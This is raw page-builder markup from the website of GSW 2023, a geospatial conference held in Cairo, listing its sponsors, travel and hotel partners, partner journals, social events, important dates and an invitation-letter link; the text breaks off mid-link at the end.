width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a></p>\n<p>&nbsp;</p>\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_column_text]</p>\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Platinum Sponsors</strong></span></h6>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144968858{margin-top: 20px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a></p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144942219{margin-top: -100px !important;}\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #000000;\"><strong>Gold </strong></span><span style=\"color: #000000;\"><strong> Sponsors</strong></span></span></p>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145343386{margin-top: -130px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145428379{margin-top: 60px !important;}\"]</p>\n<h3 style=\"text-align: center;\"></h3>\n<p>&nbsp;</p>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h5>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145725824{margin-top: -90px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145657186{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Bronze Sponsors</strong></span></h5>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145894928{margin-top: -60px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145841186{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation 